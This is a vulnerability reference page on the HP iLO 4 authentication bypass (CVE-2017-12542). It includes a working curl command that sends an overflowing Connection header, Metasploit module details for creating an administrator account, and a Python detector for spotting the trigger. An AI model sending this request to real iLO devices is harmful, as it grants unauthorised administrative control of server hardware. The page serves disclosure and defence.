HP iLO 4 Authentication Bypass
HP iLO 4 (firmware < 2.53) authentication bypass (CVE-2017-12542), caused by a buffer overflow in the web server's handling of the Connection HTTP header.
Description
Using the following header with any HTTP request should bypass the authentication:
Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Example:
curl -k -i -H "Connection: $(python -c 'print("A"*29)')" https://<IP ADDRESS>/rest/v1/AccountService/Accounts
According to the airbus-seclab ilo4_toolbox write-up, the same vulnerability can reportedly also be turned into remote code execution (RCE): https://github.com/airbus-seclab/ilo4_toolbox.
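Because the trigger is a single malformed request header, a proxy or IDS sitting in front of the iLO web interface can flag it before the firmware is patched. The following detector is an added example, not code from the original write-up or from the ilo4_toolbox project; the 28-byte threshold and the constructed sample requests are assumptions chosen to match the 29-byte trigger described above.

```python
"""Flag HTTP requests whose Connection header is oversized or not a valid
token list, the trigger of the HP iLO 4 bypass (CVE-2017-12542).
Added example for a proxy/IDS in front of the iLO; not part of the original page."""
import re

# RFC 7230: Connection is a comma-separated list of tokens ("keep-alive", "close", "Upgrade").
TOKEN_RE = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
# Assumed threshold: the documented trigger is 29 bytes, so anything longer than 28 is flagged.
MAX_CONNECTION_LEN = 28


def parse_headers(raw: bytes) -> dict:
    """Return a {lowercase-name: value} dict from the header block of a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_connection_header(raw: bytes) -> list:
    """Return the reasons a request resembles the iLO overflow trigger (empty list = clean)."""
    value = parse_headers(raw).get("connection")
    reasons = []
    if value is None:
        return reasons
    if len(value) > MAX_CONNECTION_LEN:
        reasons.append(f"Connection header is {len(value)} bytes (>{MAX_CONNECTION_LEN})")
    for item in value.split(","):
        item = item.strip()
        if item and not TOKEN_RE.match(item):
            reasons.append(f"non-token Connection value: {item!r}")
    return reasons


# Constructed sample requests (not captured traffic) for a stand-alone run.
SAMPLES = {
    "benign": b"GET /rest/v1/Systems HTTP/1.1\r\nHost: ilo\r\nConnection: keep-alive\r\n\r\n",
    "overflow": (b"GET /rest/v1/AccountService/Accounts HTTP/1.1\r\nHost: ilo\r\n"
                 b"Connection: " + b"A" * 29 + b"\r\n\r\n"),
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(label, inspect_connection_header(request) or "clean")
```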
Exploit
The following exploits use this vulnerability to create a new administrator account for the web interface.
Metasploit Module
msf > info auxiliary/admin/hp/hp_ilo_create_admin_account
Name: HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation
Module: auxiliary/admin/hp/hp_ilo_create_admin_account
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-08-24
Provided by:
Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD  ZVDlDjNTfFnY     yes       Password for the new account
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST                      yes       The target address
RPORT     443              yes       The target port (TCP)
SSL       true             no        Negotiate SSL/TLS for outgoing connections
USERNAME  lCxA6rlF         yes       Username for the new account
VHOST                      no        HTTP server virtual host
Description:
This module exploits an authentication bypass in HP iLO 4 1.00 to
2.50, triggered by a buffer overflow in the Connection HTTP header
handling by the web server. Exploiting this vulnerability gives full
access to the REST API, allowing arbitrary accounts creation.
References:
https://cvedetails.com/cve/CVE-2017-12542/
http://www.securityfocus.com/bid/100467
https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html
Standalone Python
Source: exploit-db.com/exploits/44005/